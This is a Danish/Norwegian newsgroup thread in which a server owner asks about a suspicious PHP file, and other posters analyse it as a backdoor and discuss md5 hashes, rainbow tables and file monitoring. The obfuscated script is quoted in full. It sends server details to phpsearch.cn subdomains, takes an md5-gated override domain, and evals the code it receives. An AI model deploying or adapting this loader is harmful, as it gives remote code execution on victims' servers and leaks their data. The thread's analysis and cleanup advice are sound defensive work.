---

Hei!
Kan noen gi et hint om hva denne koden gjør for funksjon evt skade??:
Den er sannsynligvis lastet opp av en intern bruker på min server.

Takk!

<? error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:
$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:
$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:
$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:
$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:
$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:
$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:
$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER
["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode
($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode
($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode
($i).".".base64_encode($j);
$f=base64_decode("cGhwc2VhcmNoLmNu");
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST
["q"])=="9123d0e5f518edcb75fd470d3bfa27c4") $f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2FkczEu").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval
($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close
($cu);eval($o);}; ?>

---

retttilstephen@gmail.com wrote:
> Hei!
> Kan noen gi et hint om hva denne koden gjør for funksjon evt skade??:
> Den er sannsynligvis lastet opp av en intern bruker på min server.
>
> Takk!

Hvis du ikke selv har lavet den fil, eller har et eller andet cms/blog,
så ville jeg slette den IMMEDIATELY!

Det den gør, den kalder op til til en eller anden adresse, med en masse
oplysninger om dig, og din bruger

Gider ikke lige sidde og decode det, for at se hvor det er den kalder op til

>
> <? error_reporting(0);
> $a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
> $b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:
> $SERVER_NAME);
> $c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:
> $REQUEST_URI);
> $d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
> $e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:
> $QUERY_STRING);
> $f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:
> $HTTP_REFERER);
> $g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:
> $HTTP_USER_AGENT);
> $h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:
> $REMOTE_ADDR);
> $i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:
> $SCRIPT_FILENAME);
> $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER
> ["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
> $z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode
> ($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode
> ($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode
> ($i).".".base64_encode($j);
> $f=base64_decode("cGhwc2VhcmNoLmNu");
> if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST
> ["q"])=="9123d0e5f518edcb75fd470d3bfa27c4") $f=$_REQUEST["id"];
> if((include(base64_decode("aHR0cDovL2FkczEu").$f.$z)));
> else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval
> ($c);
> else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
> curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close
> ($cu);eval($o);}; ?>

---

retttilstephen@gmail.com skrev:
> Hei!
> Kan noen gi et hint om hva denne koden gjør for funksjon evt skade??:
> Den er sannsynligvis lastet opp av en intern bruker på min server.

Well, jeg er ikke bange af mig, så jeg har lige smidt det på serveren,
skilt det lidt ad og givet det et skud ;)

Den forsøger at sende en masse informationer omrking hvilken side du er
på videre til http://ads1.phpsearch.cn
Besøger man siden får du en site der umiddelbart virker som om formålet
er at tjene penge via online reklamer.
For at du ikke skal få mistanke viser den så en 404 side som umiddelbart
skulle få det til at virke som om siden ikke er fundet (altså, som om
filen ikke eksisterer og dermed mindre chance for at du opdager den).

Men det lader ikke til at den er skadelig, men hvem gider at lægge
trafik til sådan noget... Anyways, en god opsætning gør at scriptet ikke
kan eksekveres effektivt.

--
Dan Storm - storm at err0r dot dk / http://err0r.dk

Tro ikke brugerne vil gøre noget for at undgå dit killfilter
- Så vigtig er du heller ikke!

---

Dan Storm wrote:

> retttilstephen@gmail.com skrev:
>> Hei!
>> Kan noen gi et hint om hva denne koden gjør for funksjon evt skade??:
>> Den er sannsynligvis lastet opp av en intern bruker på min server.

Ikke nødvendigvis. Den kan også være kommet ind ad andre veje.

> Den forsøger at sende en masse informationer omrking hvilken side du er
> på videre til http://ads1.phpsearch.cn
Eller http://71.phpsearch.cn
eller http://7.phpsearch.cn

> Men det lader ikke til at den er skadelig,

Du har overset disse 2 småting:
eval($c);
og
eval($o);

Dvs. evt returneret PHP kode bliver udført.

> men hvem gider at lægge
> trafik til sådan noget...

Det er ikke alle ejere af servere, der ved de lægger plads til sådan noget.
Formentlig alle intermidiate layers kører på inficerede servere (så
bagmændene ikke kan spores)

--
Med venlig hilsen
Stig Johansen

---

Stig Johansen skrev:
>> Den forsøger at sende en masse informationer omrking hvilken side du er
>> på videre til http://ads1.phpsearch.cn
> Eller http://71.phpsearch.cn
> eller http://7.phpsearch.cn

Så meget skilte jeg den heller ikke ad... :p

>> Men det lader ikke til at den er skadelig,
>
> Du har overset disse 2 småting:
> eval($c);
> og
> eval($o);
>
> Dvs. evt returneret PHP kode bliver udført.

Jeg kørte en var_dump() på det, men det lod ikke til at returnere noget?
Men igen, jeg kunne nok have skilt det mere ad.



> Det er ikke alle ejere af servere, der ved de lægger plads til sådan noget.
> Formentlig alle intermidiate layers kører på inficerede servere (så
> bagmændene ikke kan spores)

Ja, desværre... :/
En kollega jeg har havde et cronjob til at tjekke en gang i døgnet for
nyoprettede filer. Det virker måske lidt overkill, men idéen var god: på
den måde kunne han jo hurtigt finde filer som eventuelt har forsøgt at
deface hans website. Well, jeg har jo ikke noget liggende for tiden, så
jeg har ikke lige taget højde for så meget...

--
Dan Storm - storm at err0r dot dk / http://err0r.dk

Tro ikke brugerne vil gøre noget for at undgå dit killfilter
- Så vigtig er du heller ikke!

---

Dan Storm wrote:

>> Det er ikke alle ejere af servere, der ved de lægger plads til sådan
>> noget. Formentlig alle intermidiate layers kører på inficerede servere
>> (så bagmændene ikke kan spores)
>
> Ja, desværre... :/
> En kollega jeg har havde et cronjob til at tjekke en gang i døgnet for
> nyoprettede filer. Det virker måske lidt overkill,

Overhovedet ikke.
Jeg har leget lidt med et koncept til at overvåge både nye og ændrede filer
samt SQL injection på MS SQLServer, og formålet er at køre _meget_
hyppigere.
<http://w-o-p-r.dk/storm.monitor/index.asp>

Nåh ja - Storm - jeg valgte at kalde det Storm Monitor, men det er nu
nærmere inspireret af Botnettet Storm, og ikke dig :)

> men idéen var god: på
> den måde kunne han jo hurtigt finde filer som eventuelt har forsøgt at
> deface hans website.

Præcis - og hvis alle gjorde det, havde vi ikke alt det lort liggende på
nettet.

--
Med venlig hilsen
Stig Johansen

---

Stig Johansen skrev:
> Overhovedet ikke.
> Jeg har leget lidt med et koncept til at overvåge både nye og ændrede filer
> samt SQL injection på MS SQLServer, og formålet er at køre _meget_
> hyppigere.
> <http://w-o-p-r.dk/storm.monitor/index.asp>

Jeg har godt nok været inde og kigge på den og jeg synes idéen er god;
jeg skal jo nok have noget overvågning installeret på mit nye website,
når jeg ikke engang får nosset mig færdig med den :p

>
> Nåh ja - Storm - jeg valgte at kalde det Storm Monitor, men det er nu
> nærmere inspireret af Botnettet Storm, og ikke dig :)

Det ville dog være beærende, men jeg havde nu heller ikke regnet med det
var tilfældet hehe ;)

>
>> men idéen var god: på
>> den måde kunne han jo hurtigt finde filer som eventuelt har forsøgt at
>> deface hans website.
>
> Præcis - og hvis alle gjorde det, havde vi ikke alt det lort liggende på
> nettet.

Jeg tror bestemt du har ret - mængden af defacertools og andet skidt
ville være betydeligt mindre, hvis man havde et godt system til at
advisere mod noget uventet. Tror også hellere jeg må komme igang med at
lave noget...


--
Dan Storm - storm at err0r dot dk / http://err0r.dk

Tro ikke brugerne vil gøre noget for at undgå dit killfilter
- Så vigtig er du heller ikke!

---

Dan Storm wrote:

> når jeg ikke engang får nosset mig færdig med den :p

Ja, det er lige det med at få nosset sig færdig :)
Jeg er selv lidt splittet med det her PHP, som kører serverside:
<http://w-o-p-r.dk/storm.monitor/storm.monitor.php.txt>
På den ene side, så er det ufatteligt grimt, men på den anden side, så er
det i videst muligt omfang genbrug af et delelement af namogofer'eren (the
bad guys).

Det kan godt være jeg er lidt mærkelig, men jeg synes der er lidt humor i at
bruge deres eget 'våben' mod dem selv - deraf den grimme kode.

> Jeg tror bestemt du har ret - mængden af defacertools og andet skidt
> ville være betydeligt mindre, hvis man havde et godt system til at
> advisere mod noget uventet.

Og redirection sites, og phishing sites, og placeholders, og spam runs,
og...

> Tror også hellere jeg må komme igang med at
> lave noget...

God ide - hvis du søger på nettet, findes der mange historier om folk der
har fundet mærkelige filer på deres servere, analogt med OP.

Lad mig lige rekapitulere til OP:
Sørg for at finde ud af _hvordan_ den fil er landet på dit system.
At slette den er fint, men hvis ikke 'hullet' er lukket, så kommer den igen.

--
Med venlig hilsen
Stig Johansen

---

---

---

Her kan i se hvad den outputtet og sender: http://mentos.wep.dk/scooterhjemmeside/php/test1.php

Den del af kildekoden hvor der står md5 det må vel være et krypteret
password er det ik ?
Ligesom at scriptet logger på phpsearch.cn og logger på og aflevere de
øverste data på test1.php

Der var en der uploadet et php script til min hjemmeside som slettede
filer så hvis der var nogen der uploadet det der script så ville jeg
ikke have de kunne udfører det.

Jeg har gjort så php kode bliver vist som almindelig tekst på min
hjemmeside, så de kan uploade php men ikke udfører det.
Se f.eks: http://mentos.wep.dk/scooterhjemmeside/download/upload/test.php

---

ScooterGrisen wrote:

> Her kan i se hvad den outputtet og sender:
> http://mentos.wep.dk/scooterhjemmeside/php/test1.php

Det skal du nu ikke være sikker på.

> Den del af kildekoden hvor der står md5 det må vel være et krypteret
> password er det ik ?

Næsten, hashet 'password' er nok mere rigtigt.

> Ligesom at scriptet logger på phpsearch.cn og logger på og aflevere de
> øverste data på test1.php

Ikke nødvendigvis.
Bemærk linien her:
$f=base64_decode("cGhwc2VhcmNoLmNu");
Den sætter $f til phpsearch.cn initielt.

Men hvis vi kigger på linien:
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST
["q"])=="9123d0e5f518edcb75fd470d3bfa27c4") $f=$_REQUEST["id"];

Medfører det, at hvis den bliver kaldt med den rigtige 'q', så bliver $f sat
til 'id'.

'Man' kan altså kalde scriptet med
scriptets_navn?q=<secret>&id=the.real.bad.domaine

Så vil $f indeholde the.real.bad.domaine og ikke phpsearch.cn.
Dermed vil den kalde, måske, http://71.the.real.bad.domaine.. + data

Resultatet af den efterfølgende get.. eller curl.. vil blive eksekveret med
eval.

Forretningsgangen er at svineørerne finder et (nyt) domaine (navn).
Her lægger de den kode, de ønsker udført på din server.
Så konfigurerer man bot'erne til at udføre requests med disse data på de
servere, der ligger i deres 'dictionary'.

Nettoresultatet er, at den server, der indeholder skadelig kode, og kunne
være sporbar, ikke fremgår nogle steder, bortset fra serverens logfil.

Hvis man vel og mærket logger, gemmer, og analyserer Querystring (det, der
står efter ?).

--
Med venlig hilsen
Stig Johansen

---

Stig Johansen wrote:

> Men hvis vi kigger på linien:
> if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST
> ["q"])=="9123d0e5f518edcb75fd470d3bfa27c4") $f=$_REQUEST["id"];

Kom lige i tanke om, hvis der er nogen der ønsker at lege med ilden.
Der er vistnok md5 generatorer online, men ellers har jeg en lille en her:
<http://w-o-p-r.dk/wopr.tools/wopr.md5.generator.asp>

En md5 på the_evil giver:
0608a1c41eca47c6381ef94048203079

Hvis man indsætter det i if sætningen, så kan man teste scriptet med
?q=the_evil&id=det.domaine.du.vil.kalde

--
Med venlig hilsen
Stig Johansen

---

Hvis nu jeg skriver hejsa i md5 sum generatoren så får jeg
478ac43056d0bbfedd52a1c806c9a16c.
Men hvad skal man bruge det til og kan man decode
478ac43056d0bbfedd52a1c806c9a16c ?

Jeg ved at md5 bruges til at checke om downloadet filer er blevet
korrekt downloadet eller om der er sket en fejl.
Har MD5 noget med passwords at gøre ?

---

"ScooterGrisen" <fedblindkat@yahoo.dk> wrote in message
news:088cd9bc-58dd-46e4-bb1f-6aa9806ed83e@s9g2000prg.googlegroups.com...
>Hvis nu jeg skriver hejsa i md5 sum generatoren så får jeg
>478ac43056d0bbfedd52a1c806c9a16c.
>Men hvad skal man bruge det til og kan man decode
>478ac43056d0bbfedd52a1c806c9a16c ?

Nej, MD5 er en envejs hash, og kan ikke dekrypteres.
I det her tilfælde med filen fra OP, kan du rette
.... md5($_REQUEST
["q"])=="9123d0e5f518edcb75fd470d3bfa27c4") ...
til
.... md5($_REQUEST
["q"])=="478ac43056d0bbfedd52a1c806c9a16c") ...
så vil stumpen blive udført hvis man kalder den med id=hejsa

>Jeg ved at md5 bruges til at checke om downloadet filer er blevet
>korrekt downloadet eller om der er sket en fejl.
>Har MD5 noget med passwords at gøre ?

Ja, også til det. Man kan typisk gemme MD5 af password i databaserne, så det
ikke fremgår i klartekst.

--
Med venlig hilsen/Best regards
Stig Johansen

---

"Stig Johansen" <wopr.dk@gmail.com> wrote in message
news:4939d771$0$90263$14726298@news.sunsite.dk...
> "ScooterGrisen" <fedblindkat@yahoo.dk> wrote in message
> news:088cd9bc-58dd-46e4-bb1f-6aa9806ed83e@s9g2000prg.googlegroups.com...
> I det her tilfælde med filen fra OP, kan du rette
> ... md5($_REQUEST
> ["q"])=="9123d0e5f518edcb75fd470d3bfa27c4") ...
> til
> ... md5($_REQUEST
> ["q"])=="478ac43056d0bbfedd52a1c806c9a16c") ...
> så vil stumpen blive udført hvis man kalder den med id=hejsa

Skulle have været q=hejsa

--
Med venlig hilsen/Best regards
Stig Johansen

---

ScooterGrisen wrote:
> Hvis nu jeg skriver hejsa i md5 sum generatoren så får jeg
> 478ac43056d0bbfedd52a1c806c9a16c.
> Men hvad skal man bruge det til og kan man decode
> 478ac43056d0bbfedd52a1c806c9a16c ?

Nogle gange, der findes noget der kaldes Rainbow tables, som faktisk
bare er ord, som bruger har sat ind, også er MD5 koden fundet for det
også blevet sat ind.

Så hvis man søger efter
478ac43056d0bbfedd52a1c806c9a16c
giver det
hejsa

I det oprindelige script bliver
9123d0e5f518edcb75fd470d3bfa27c4
brugt, men denne findes desværre ikke i den rainbow table jeg lige søger i.

http://md5.rednoize.com/
(virker også med SHA1)

---

"Martin" <martin@aarhof.invalid> wrote in message
news:493acd75$0$90266$14726298@news.sunsite.dk...
> Nogle gange, der findes noget der kaldes Rainbow tables, som faktisk
> bare er ord, som bruger har sat ind, også er MD5 koden fundet for det
> også blevet sat ind.
>
> Så hvis man søger efter
> 478ac43056d0bbfedd52a1c806c9a16c
> giver det
> hejsa
>
> I det oprindelige script bliver
> 9123d0e5f518edcb75fd470d3bfa27c4
> brugt, men denne findes desværre ikke i den rainbow table jeg lige søger
i.
>
> http://md5.rednoize.com/
> (virker også med SHA1)

Det var da godt nok den mest usmagelige service jeg nogen sinde har set
eksponeret på internettet - håber ikke du er en del af det.
Har du fundet - eller oprettet den entry, du refererer (hejsa) ?

Hvem opretter hvad, og hvorfor ?

Namogofer'en bruger:
aace99428c50dbe965acc93f3f275cd3
Som tilsyneladende er:
Ox93Mdpqme8s

Men da den kan skifte identitet over tid, kan man ikke bruge det til noget.

--
Med venlig hilsen/Best regards
Stig Johansen

---

Stig Johansen wrote:
> Det var da godt nok den mest usmagelige service jeg nogen sinde har set
> eksponeret på internettet - håber ikke du er en del af det.

Tjah - usmagelig og usmagelig. Jeg har ikke det store problem med den.

> Har du fundet - eller oprettet den entry, du refererer (hejsa) ?

Vil gætte på de blot har kørt en masse tekster ind.

> Hvem opretter hvad, og hvorfor ?

Hvis du klikker "switch mode" - og skriver "Stig" - så får du en MD5
hash af Stig ;) Den næste der søger præcis på den md5 hash vil få at
vide det svarer til sitg.

> Namogofer'en bruger:
> aace99428c50dbe965acc93f3f275cd3
> Som tilsyneladende er:
> Ox93Mdpqme8s

Det er *også* det - men det kan også være alt muligt andet.
En MD5 er ikke unik. Altså - 2 ord kan sagnes have den samme MD5 sum.

> Men da den kan skifte identitet over tid, kan man ikke bruge det til noget.

Tjah - og hvad der kommer ud af af "reverse" md5'en giver ikke den det
store resultat. I mange tilfælde er der jo f.eks. tilføjet salt til en
md5 hashing. Og så får du ikke det korrekte resultat i ovestående link.

--
Johan Holst Nielsen
Freelance PHP Developer - http://phpgeek.dk

---

Stig Johansen skrev:
> "Martin" <martin@aarhof.invalid> wrote in message
> news:493acd75$0$90266$14726298@news.sunsite.dk...
>> Nogle gange, der findes noget der kaldes Rainbow tables, som faktisk
>> bare er ord, som bruger har sat ind, også er MD5 koden fundet for det
>> også blevet sat ind.
>>
>> Så hvis man søger efter
>> 478ac43056d0bbfedd52a1c806c9a16c
>> giver det
>> hejsa
>>
>> I det oprindelige script bliver
>> 9123d0e5f518edcb75fd470d3bfa27c4
>> brugt, men denne findes desværre ikke i den rainbow table jeg lige søger
> i.
>> http://md5.rednoize.com/
>> (virker også med SHA1)
>
> Det var da godt nok den mest usmagelige service jeg nogen sinde har set
> eksponeret på internettet - håber ikke du er en del af det.
> Har du fundet - eller oprettet den entry, du refererer (hejsa) ?
>
(Gammelt indlæg, undskyld)

Det kan være man skulle bruge ledig kapacitet til at fylde tilfældigt
genererede ord ind i den service.

Bare blive ved med at kalde den rekursivt. Så kan de dumme
hacker-wannabe´s ikke bruge den til noget, da uendeligt mange
bogstavkombinationer kan give den samme md5. Og databasen kan blive
fyldt op...

Leif

---

---

Takk for alle innspill.

Jeg har nå underøkt serveren nøyere og funnet ut at det har blitt lagt
samme fil i ALLE MAPPER!!!!!! ( 571 stk!!)) ( Med ulike navn som alle
har det til felles at de har ca 6 siffer.php - f.eks. "196240.php"

Har en stor slette-jobb foran meg - og ukjent hvilke fare dette
scriptet kan ha avstedkommet allerede.

-SR

---

Stephen wrote:

> Jeg har nå underøkt serveren nøyere og funnet ut at det har blitt lagt
> samme fil i ALLE MAPPER!!!!!! ( 571 stk!!)) ( Med ulike navn som alle
> har det til felles at de har ca 6 siffer.php - f.eks. "196240.php"

Ja, de har det med at lægge skidtet alle steder fra roden og nedefter.

> Har en stor slette-jobb foran meg - og ukjent hvilke fare dette
> scriptet kan ha avstedkommet allerede.

Gør dig selv den tjeneste at kontrollere, eller i det mindste lave
stikprøvekontrol på, dine normale PHP/HTM(L) sider.

Det er ikke umuligt der også er røget nogle <script>/<iframe> tags ind dér.

--
Med venlig hilsen
Stig Johansen

---

Hej

Er lidt nysgerrig. Hvad hedder din webhost? Skulle det mon være Servage?

Hilsen
Martin

---

On 11 Dec., 00:39, Martin Larsen <w...@no.spam> wrote:
> Hej
>
> Er lidt nysgerrig. Hvad hedder din webhost? Skulle det mon være Servage?
>
> Hilsen
> Martin


Webhost'en er servetheworld.com (norsk-basert firma).

Etter nærmere ettersyn var kun de fleste (ikke alle) mapper infiserte.
Endel av mappene var knyttet til uploadscript for brukerne - og det er
måske der uvesenet har kommet seg inn ( til tross for at hele området
ligger bak passordbeskyttet område - beskyttet med Needsecure (http://
needsecure.com/) - som jeg forøvrig er meget fornøyd med.